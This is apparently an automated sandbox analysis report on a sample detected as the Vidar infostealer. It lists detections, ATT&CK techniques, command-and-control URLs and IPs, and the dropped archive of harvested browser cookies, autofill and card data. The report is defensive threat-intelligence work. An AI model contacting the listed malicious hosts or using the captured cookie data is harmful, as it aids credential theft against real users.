File source: 00000001.00000002.278147128.00000000006C4000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.21a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.0lm81UZm7Y.exe.22c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.21a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.0lm81UZm7Y.exe.22c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.278284873.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.247214194.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0lm81UZm7Y.exe PID: 6636, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection11	Deobfuscate/Decode Files or Information1	Credentials in Registry1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery4	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	System Information Discovery56	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0lm81UZm7Y.exe	34%	Virustotal		Browse
0lm81UZm7Y.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.0lm81UZm7Y.exe.21a0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
1.3.0lm81UZm7Y.exe.22c0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
mas.to	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://159.69.203.58/mozglue.dll	13%	Virustotal		Browse
http://159.69.203.58/mozglue.dll	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
https://mas.to	0%	Virustotal		Browse
https://mas.to	0%	Avira URL Cloud	safe
http://159.69.203.58/msvcp140.dll	13%	Virustotal		Browse
http://159.69.203.58/msvcp140.dll	0%	Avira URL Cloud	safe
https://mas.to/users/killern0	0%	Avira URL Cloud	safe
https://mas.to;	0%	Avira URL Cloud	safe
https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to	0%	Avira URL Cloud	safe
http://159.69.203.58/nss3.dll	0%	Avira URL Cloud	safe
http://159.69.203.58/	0%	Avira URL Cloud	safe
http://159.69.203.58/softokn3.dll	0%	Avira URL Cloud	safe
https://mas.to/	0%	Avira URL Cloud	safe
http://159.69.203.58/vcruntime140.dll	0%	Avira URL Cloud	safe
http://159.69.203.58/1008	0%	Avira URL Cloud	safe
http://159.69.203.58/freebl3.dll	0%	Avira URL Cloud	safe
https://media.mas.to	0%	Avira URL Cloud	safe
https://mas.to/@killern0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mas.to	88.99.75.82	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://159.69.203.58/mozglue.dll	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://159.69.203.58/msvcp140.dll	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://159.69.203.58/nss3.dll	false	Avira URL Cloud: safe	unknown
http://159.69.203.58/	false	Avira URL Cloud: safe	unknown
http://159.69.203.58/softokn3.dll	false	Avira URL Cloud: safe	unknown
http://159.69.203.58/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
http://159.69.203.58/1008	false	Avira URL Cloud: safe	unknown
http://159.69.203.58/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://mas.to/@killern0	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	temp.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.1.dr	false		high
https://duckduckgo.com/ac/?q=	temp.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	temp.1.dr	false		high
http://ocsp.thawte.com0	nss3[1].dll.1.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com0	nss3[1].dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	temp.1.dr	false		high
https://mas.to	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	temp.1.dr	false		high
https://mas.to/users/killern0	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mas.to;	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	temp.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	nss3[1].dll.1.dr	false		high
https://mas.to/	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabSQLite	temp.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	temp.1.dr	false		high
https://media.mas.to	0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	temp.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.99.75.82	mas.to	Germany		24940	HETZNER-ASDE	false
159.69.203.58	unknown	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	490255
Start date:	25.09.2021
Start time:	10:13:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0lm81UZm7Y.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/18@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 89% Number of executed functions: 76 Number of non-executed functions: 31
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.210.154, 40.112.88.60, 93.184.221.240, 20.82.209.183, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.99.75.82	kI3s0EHB23.exe	Get hash	malicious	Browse
	3oZf2AWs3o.exe	Get hash	malicious	Browse
	1wiBg3rNF8.exe	Get hash	malicious	Browse
	QaDhnpiLyq.exe	Get hash	malicious	Browse
	EA00OMo1tS.exe	Get hash	malicious	Browse
	cj6LIPaeUz.exe	Get hash	malicious	Browse
	VtLAo0xV0T.exe	Get hash	malicious	Browse
	7RIDZ5nRku.exe	Get hash	malicious	Browse
	setup_x86_x64_install.exe	Get hash	malicious	Browse
	LT8x22KHHG.exe	Get hash	malicious	Browse
	HVHU71yzzA.exe	Get hash	malicious	Browse
	6Fy45hLYl0.exe	Get hash	malicious	Browse
	ExQjKsR148.exe	Get hash	malicious	Browse
	fXMEzg5Fjm.exe	Get hash	malicious	Browse
	2XLHix3B2c.exe	Get hash	malicious	Browse
	0fx09eBpoa.exe	Get hash	malicious	Browse
	3HuW7WBipG.exe	Get hash	malicious	Browse
	R5R1EO1Lxs.exe	Get hash	malicious	Browse
	rfuXvlBuYJ.exe	Get hash	malicious	Browse
	Teric4r3o5.exe	Get hash	malicious	Browse
159.69.203.58	kI3s0EHB23.exe	Get hash	malicious	Browse	159.69.203.58/
	3oZf2AWs3o.exe	Get hash	malicious	Browse	159.69.203.58/vcruntime140.dll
	1wiBg3rNF8.exe	Get hash	malicious	Browse	159.69.203.58/
	QaDhnpiLyq.exe	Get hash	malicious	Browse	159.69.203.58/
	EA00OMo1tS.exe	Get hash	malicious	Browse	159.69.203.58/
	cj6LIPaeUz.exe	Get hash	malicious	Browse	159.69.203.58/
	VtLAo0xV0T.exe	Get hash	malicious	Browse	159.69.203.58/
	7RIDZ5nRku.exe	Get hash	malicious	Browse	159.69.203.58/
	LT8x22KHHG.exe	Get hash	malicious	Browse	159.69.203.58/
	HVHU71yzzA.exe	Get hash	malicious	Browse	159.69.203.58/
	6Fy45hLYl0.exe	Get hash	malicious	Browse	159.69.203.58/
	ExQjKsR148.exe	Get hash	malicious	Browse	159.69.203.58/
	fXMEzg5Fjm.exe	Get hash	malicious	Browse	159.69.203.58/
	2XLHix3B2c.exe	Get hash	malicious	Browse	159.69.203.58/
	0fx09eBpoa.exe	Get hash	malicious	Browse	159.69.203.58/
	3HuW7WBipG.exe	Get hash	malicious	Browse	159.69.203.58/
	R5R1EO1Lxs.exe	Get hash	malicious	Browse	159.69.203.58/vcruntime140.dll
	rfuXvlBuYJ.exe	Get hash	malicious	Browse	159.69.203.58/
	Teric4r3o5.exe	Get hash	malicious	Browse	159.69.203.58/
	G3QpUGAM0L.exe	Get hash	malicious	Browse	159.69.203.58/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mas.to	kI3s0EHB23.exe	Get hash	malicious	Browse	88.99.75.82
	3oZf2AWs3o.exe	Get hash	malicious	Browse	88.99.75.82
	1wiBg3rNF8.exe	Get hash	malicious	Browse	88.99.75.82
	QaDhnpiLyq.exe	Get hash	malicious	Browse	88.99.75.82
	EA00OMo1tS.exe	Get hash	malicious	Browse	88.99.75.82
	cj6LIPaeUz.exe	Get hash	malicious	Browse	88.99.75.82
	VtLAo0xV0T.exe	Get hash	malicious	Browse	88.99.75.82
	7RIDZ5nRku.exe	Get hash	malicious	Browse	88.99.75.82
	LT8x22KHHG.exe	Get hash	malicious	Browse	88.99.75.82
	HVHU71yzzA.exe	Get hash	malicious	Browse	88.99.75.82
	6Fy45hLYl0.exe	Get hash	malicious	Browse	88.99.75.82
	ExQjKsR148.exe	Get hash	malicious	Browse	88.99.75.82
	fXMEzg5Fjm.exe	Get hash	malicious	Browse	88.99.75.82
	2XLHix3B2c.exe	Get hash	malicious	Browse	88.99.75.82
	0fx09eBpoa.exe	Get hash	malicious	Browse	88.99.75.82
	3HuW7WBipG.exe	Get hash	malicious	Browse	88.99.75.82
	R5R1EO1Lxs.exe	Get hash	malicious	Browse	88.99.75.82
	rfuXvlBuYJ.exe	Get hash	malicious	Browse	88.99.75.82
	Teric4r3o5.exe	Get hash	malicious	Browse	88.99.75.82
	G3QpUGAM0L.exe	Get hash	malicious	Browse	88.99.75.82

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	ccFkGrtkhM.exe	Get hash	malicious	Browse	88.99.66.31
	KqXA36ARxD.exe	Get hash	malicious	Browse	88.99.66.31
	p7jfy1lZgI.exe	Get hash	malicious	Browse	88.99.66.31
	W1sfDNhonu.exe	Get hash	malicious	Browse	88.99.66.31
	9XE9o2AvE1.exe	Get hash	malicious	Browse	95.217.228.176
	kI3s0EHB23.exe	Get hash	malicious	Browse	159.69.203.58
	9BdsqglvfC.exe	Get hash	malicious	Browse	88.99.66.31
	3oZf2AWs3o.exe	Get hash	malicious	Browse	159.69.203.58
	IocDW5Iw8k.exe	Get hash	malicious	Browse	135.181.142.223
	1wiBg3rNF8.exe	Get hash	malicious	Browse	159.69.203.58
	QaDhnpiLyq.exe	Get hash	malicious	Browse	159.69.203.58
	tI0W00k1vt	Get hash	malicious	Browse	185.107.55.203
	1bI3lLLM2r.exe	Get hash	malicious	Browse	144.76.183.53
	EA00OMo1tS.exe	Get hash	malicious	Browse	159.69.203.58
	18vaq1Ah2l	Get hash	malicious	Browse	197.242.86.253
	cj6LIPaeUz.exe	Get hash	malicious	Browse	88.99.66.31
	dRwdYuZ3ck.exe	Get hash	malicious	Browse	95.217.248.44
	arm7	Get hash	malicious	Browse	78.47.207.212
	ZRrz9IezQo.exe	Get hash	malicious	Browse	136.243.159.53
	VtLAo0xV0T.exe	Get hash	malicious	Browse	159.69.203.58
HETZNER-ASDE	ccFkGrtkhM.exe	Get hash	malicious	Browse	88.99.66.31
	KqXA36ARxD.exe	Get hash	malicious	Browse	88.99.66.31
	p7jfy1lZgI.exe	Get hash	malicious	Browse	88.99.66.31
	W1sfDNhonu.exe	Get hash	malicious	Browse	88.99.66.31
	9XE9o2AvE1.exe	Get hash	malicious	Browse	95.217.228.176
	kI3s0EHB23.exe	Get hash	malicious	Browse	159.69.203.58
	9BdsqglvfC.exe	Get hash	malicious	Browse	88.99.66.31
	3oZf2AWs3o.exe	Get hash	malicious	Browse	159.69.203.58
	IocDW5Iw8k.exe	Get hash	malicious	Browse	135.181.142.223
	1wiBg3rNF8.exe	Get hash	malicious	Browse	159.69.203.58
	QaDhnpiLyq.exe	Get hash	malicious	Browse	159.69.203.58
	tI0W00k1vt	Get hash	malicious	Browse	185.107.55.203
	1bI3lLLM2r.exe	Get hash	malicious	Browse	144.76.183.53
	EA00OMo1tS.exe	Get hash	malicious	Browse	159.69.203.58
	18vaq1Ah2l	Get hash	malicious	Browse	197.242.86.253
	cj6LIPaeUz.exe	Get hash	malicious	Browse	88.99.66.31
	dRwdYuZ3ck.exe	Get hash	malicious	Browse	95.217.248.44
	arm7	Get hash	malicious	Browse	78.47.207.212
	ZRrz9IezQo.exe	Get hash	malicious	Browse	136.243.159.53
	VtLAo0xV0T.exe	Get hash	malicious	Browse	159.69.203.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	ccFkGrtkhM.exe	Get hash	malicious	Browse	88.99.75.82
	h2MBI7TaFm.exe	Get hash	malicious	Browse	88.99.75.82
	h2MBI7TaFm.exe	Get hash	malicious	Browse	88.99.75.82
	kI3s0EHB23.exe	Get hash	malicious	Browse	88.99.75.82
	9BdsqglvfC.exe	Get hash	malicious	Browse	88.99.75.82
	3oZf2AWs3o.exe	Get hash	malicious	Browse	88.99.75.82
	1wiBg3rNF8.exe	Get hash	malicious	Browse	88.99.75.82
	QaDhnpiLyq.exe	Get hash	malicious	Browse	88.99.75.82
	qUaCp2QNnD.exe	Get hash	malicious	Browse	88.99.75.82
	Vxkz7d1Hh3.exe	Get hash	malicious	Browse	88.99.75.82
	Vxkz7d1Hh3.exe	Get hash	malicious	Browse	88.99.75.82
	Silver_Light_Group_DOC030273211220213.exe	Get hash	malicious	Browse	88.99.75.82
	EA00OMo1tS.exe	Get hash	malicious	Browse	88.99.75.82
	Payment.Receipt.html	Get hash	malicious	Browse	88.99.75.82
	cj6LIPaeUz.exe	Get hash	malicious	Browse	88.99.75.82
	IC-230921 135838 ggo.htm	Get hash	malicious	Browse	88.99.75.82
	BESTPREIS-ANFRAGE.exe	Get hash	malicious	Browse	88.99.75.82
	VtLAo0xV0T.exe	Get hash	malicious	Browse	88.99.75.82
	qkF3PCHVXs.xls	Get hash	malicious	Browse	88.99.75.82
	7RIDZ5nRku.exe	Get hash	malicious	Browse	88.99.75.82

Dropped Files

No context

Created / dropped Files

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\d06ed635-68f6-4e9a-955c-4899f5f57b9a5820605205.zip Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	96927
Entropy (8bit):	7.987376020822924
Encrypted:	false
SSDEEP:	1536:5XBZsUmulAZizEskbFbZIqJgjeg5E1HBLdcVpmZjKAUTbUdouVQRbhyFwIg2U/QT:5XBZsBulFYsGViCgje71hLaVokbU2u+A
MD5:	E1DA94238E75A02A6F3B0E1518B01E40
SHA1:	8AB5A3A1B3D497697BCCEC088244B1037099C9F8
SHA-256:	F7B637924496D0DC899FD901F143DBAF4B1106255FB762DFCDF2AEBC397D1A43
SHA-512:	71B06B4880081D3A7B5D32D7D7E2F3A38A31D59CD3E0AA1CF12563215CC9B48914D8A9A5642CCE758998C72D37C1B722D8FC397684DB278DC9EB320B3FC58DD9
Malicious:	false
Reputation:	low
Preview:	PK.........9S............#.../Autofill/Google Chrome_Default.txtUT....YOa.YOa.YOa..PK.........9S............#.../Autofill/Google Chrome_Default.txtUT....YOa.YOa.YOaPK.........9S................/CC/Google Chrome_Default.txtUT....YOa.YOa.YOa..PK.........9S................/CC/Google Chrome_Default.txtUT....YOa.YOa.YOaPK.........9S................/Cookies/Edge_Cookies.txtUT....YOa.YOa.YOa..PK.........9S................/Cookies/Edge_Cookies.txtUT....YOa.YOa.YOaPK.........9S............".../Cookies/Google Chrome_Default.txtUT....YOa.YOa.YOa-.r.0......Q....C...H.T...RRs...j%.}.~..Z..{.ke.Q..X/....@.: .......\..^..8.i..^.6.s.".._s^_@5...L7.-.R.......O....f..N~.]O9b..[N........vL.].e?...<&.$..U.V..F.......Tp..s..C.0\|1..AY.l.....PK.........9S..qu........".../Cookies/Google Chrome_Default.txtUT....YOa.YOa.YOaPK.........9S................/Cookies/IE_Cookies.txtUT....YOa.YOa.YOa..PK.........9S................/Cookies/IE_Cookies.txtUT....YOa.YOa.YOaPK.........9S............$.../

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.85510047038065
Encrypted:	false
SSDEEP:	6:PkopYjdt38FfrfXoL2fgsQvYf6gOOr7kmh:copYxt3efJQAf6h2omh
MD5:	C4EBAFA07BE27655244E42B8F1151887
SHA1:	6462D6E731E6A06E92E1A2CBC547FC750E114A67
SHA-256:	EA80C2FBBF9258C495719B8E4284E7462826E61EDD2E706AFD46226DBC7C0E27
SHA-512:	80B3FC32559AB487C93C37E9B6A86803E6159A36FC84ADF1C5F71128784003A6CC5EE66134ABB0D56DCE433939FD419586B137B5D473152166FED73225EC8DA6
Malicious:	false
Preview:	.google.com.FALSE./.FALSE.1617281028.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Files\Default.zip Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Preview:	PK....................

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\information.txt Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12333
Entropy (8bit):	5.289829505903937
Encrypted:	false
SSDEEP:	192:MOIO5OaQkmHnMbQjWpgBdQXRsg8qbNqqN:1xQJZHnM8jWpgUX2MboqN
MD5:	EFF353E26E13F6462EE3039A13D949DE
SHA1:	695408D04FEA104ACF2801C9326A26ED1FD4FAA1
SHA-256:	8A1531D2B120705D0AF998DC15458FF0247CC503EAA9EFDE6D457A28153C4EDC
SHA-512:	AE76555E8E21E379A43318821E7DC5181687246F86368797AF585E4FFB7D7CFB9CF03E5CC11D7EDDE3F43C105C21B11C612D824908B1FE2AF94EF0088537486D
Malicious:	false
Preview:	Version: 41....Date: Sat Sep 25 10:15:05 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\Desktop\0lm81UZm7Y.exe ..Work Dir: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ ....Windows: Windows 10 Pro [x64]..Computer Name: 715575..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 25/9/2021 10:15:5..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [296]..- csrss.exe [388]..- wininit.exe [460]..- csrss.exe [472]..- services.exe [556]..- winlogon.exe [564]..- lsass.exe [584]..- fontdrvhost.exe [680]..- fontdrvhost.exe [688]..- svchost.exe [708]..- svchost.exe [792]..- svchost.exe [83

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\0lm81UZm7Y.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	95175
Entropy (8bit):	7.917148769434925
Encrypted:	false
SSDEEP:	1536:CLVy/rPzIb/iH5Ll8yivftLFtDKTnnmGHp/aOY6di2WAaJ3Jy71g03DhiVxp6FRi:mavc6DhpicA2W55oFKQdE
MD5:	20A43A25B2EDF4E4C9077536C21B270E
SHA1:	5C8E3282987247CDE264F6255DA9AC0E3EB36AF1
SHA-256:	9D8BAA920B928872B4B4F6C7E623ED0211791D52B1BAAF6BF73FF260FEA18E20
SHA-512:	88B1887A0711476A21256A907F883C660FEC9155AB38927453D9AF7EA89DE15A1F6742009319E386E982D2F2A402C9A86C543CAF766EF4481601E051DB72CE07
Malicious:	false
